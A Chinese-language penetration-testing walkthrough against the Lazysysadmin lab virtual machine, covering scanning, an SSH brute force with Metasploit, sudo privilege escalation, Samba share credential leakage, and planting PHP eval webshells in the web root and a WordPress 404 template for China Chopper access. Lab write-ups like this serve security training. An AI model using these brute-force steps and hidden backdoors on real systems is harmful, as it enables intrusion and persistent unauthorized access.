一、實驗環境1.靶機:Lazysysadmin
2.測試機:Kali
3.幫兇機:Windows 10
4.掃描工具:Nesssus
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
二,這裏我們分爲2種方式來實驗
1、用字典來爆破連接
2、用木馬來連接
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2.1(第一種字典爆破)
(1)信息收集
查詢測試機ip地址,判斷所處網段
測試機所處網段 192.168.0.0
(2)主機發現
root@akemi:~# netdiscover -i eth0 -r 192.168.0.0/24
參數說明
-i 指定網卡名
-r 指定網段
(3)端口掃描(masscan/nmap)
root@akemi:~# masscan --rate=10000 --ports 0-65535 192.168.0.99
masscan掃描速度快,但準確度不高,可以多掃幾次,以防漏掃
或者使用nmap
root@akemi:~# nmap -sV -T4 -p 6667,22,139,445,80,3306 192.168.0.99
namp:-T4(分爲0-5等級;-sV(版本信息與開啓服務);-A(詳細掃描開放的端口的具體服務)
與masscan相比,namp更詳細,但是速度較慢(可以先使用masscan掃描出端口,再用nmap詳細掃描開放的端口)
開啓了6667(ircd 互聯網中繼聊天守護進程),22(ssh服務),139、445(smaba共享服務),80(Apache服務),3306(MySQL)端口
(4)漏洞掃描
開啓nessusd服務,
如果沒有安裝點擊這裏
root@akemi:~# /etc/init.d/nessusd restart
登錄nessusd服務(本地的8834端口)
選擇“我的掃描”>>“新建掃描”
選擇“進階掃描”
(5)ssh爆破(22端口)
原理:靶機用戶存在弱口令漏洞,利用枚舉的方法破解目標主機ssh服務(使用Metasploit)
5.1)啓動msfconsole
5.2)搜索ssh_login的相關工具和攻擊負載
search ssh_login
5.3)啓用漏洞模塊,並查看需要的設置的相關項
use auxiliary/scanner/ssh/ssh_login
show options
5.4)設置目標主機的IP地址
set rhosts 192.168.0.99
5.5)設置登錄用戶的用戶文件(這裏我提前寫好文件了
set user_file /root/user.txt
5.6(設置暴力破解的密碼問價路徑
5.7)開始向目標主機爆破ssh的登錄賬號和密碼
exploit
5.8)遠程連接目標主機
ssh [email protected]
5.9)終極三問
whoami———>pwd———>uname -a
5.10)查詢/etc/passwd文件權限
ls -l /etc/passwd
/etc/passwd僅root擁有可讀可寫權限,togie只擁有可讀權限
5.11)查看當前用戶togie允許命令的權限信息
sudo -l
togie用戶在本機上允許命令的權限爲所有
groups
togie用戶所在組爲:sudo
5.12)提權(獲取root權限)
sudo su root
5.13)上傳後門文件(一句話木馬)
後門文件(一句話木馬),可以多放幾個在不同目錄(必須是在/var/www/html目錄下),使用不同文件名(隱藏深點)
也可以使用webacoo工具自動生成一句話木馬(webacoo -g -o 1.php)
<?php @eval($_POST[a])?>
5.14)啓用中國菜刀,獲取webshell權限(後門測試)
只要後門沒有被清除,都可以用菜刀爲所欲爲
二、web測試
1.通過瀏覽器訪問http://192.168.0.99 , 分析整個網頁發現沒啥東西
用默認目錄掃描工具(dirb),掃描對應網站的目錄
dirb 192.168.0.99
3、對掃描出來的目錄進行分析
掃描出來info.php文件,瀏覽器訪問,下圖可以看到目標存在信息泄露漏洞
4.掃描出來/phpmyadmin/目錄,瀏覽器訪問,可以看到是mysql的後臺登錄界面,嘗試弱口令或者暴力破解
5掃描發現wordpress ,瀏覽器訪問,發現其中含有疑似用戶名的信息
6嘗試登錄wordpress的默認後臺管理頁面wp-login.php
7.嘗試輸入一些簡單的弱口令,提示如下錯誤信息,發現用戶名是admin,此處存在用戶名名枚舉漏洞,然後嘗試暴力破解密碼
補充:
使用wpscan掃描http://192.168.0.99/wordpress 看是否含有漏洞
Vp 只枚舉有漏洞的插件,vt只枚舉存在漏洞的主題,tt列舉縮略圖相關的文件
因爲是WordPress博客的,所以可以使用wpsan進行漏洞掃描
wpscan --url http://192.168.0.99/wordpress -e vp,vt,tt
4、嘗試從samba服務發現漏洞
使用enum4linux枚舉運行samba的主機信息
enum4linux 192.168.106.140
掃描完成後發現存在共享目錄,允許空口令
可以遠程掛載,查看共享目錄,發現共享的是網站的根目錄
mount -t cifs -o username=’’,password=’’ //192.168.0.99/share$ /mnt
Cd到wordpress目錄,查看配置文件,可以看到wordpress後臺的用戶名以及密碼
或者在windows訪問共享
訪問方法:\\192.168.0.99\share$\wordpress
用得到用戶名與密碼嘗試登錄phpmyadmin,成功登錄進去
嘗試查看數據,發現此賬戶對數據庫沒有任何權限
嘗試用數據庫的用戶名密碼登錄wordpress後臺,成功登錄
可以在一個404頁面中添加一句話木馬留後門,上傳這個404頁面
<?php @eval($_POST[b]);?>
在瀏覽器訪問一個不存在的頁面,可以看到跳轉到404頁面,這時也就執行了插入其中的一句話木馬
打開菜刀工具,連接url, 成功反彈shell,經測試發現就下圖的菜刀可以連接成功,其餘菜刀不可以
總結
1.信息收集
判斷網段
主機發現
端口掃描
1.1漏洞掃描
1.2開啓nessusd服務,加載插件,登錄
1.3.建立掃描
1.4.掃描結果
2.dirb目錄爆破
默認字典目錄掃描
指定字典目錄掃描
3.ssh爆破(msfconsole)
4.wpscan掃描wordpress漏洞
5.文件共享信息泄露
6.進入後臺,Appearance頁面404.php掛馬,菜刀連接,反彈shell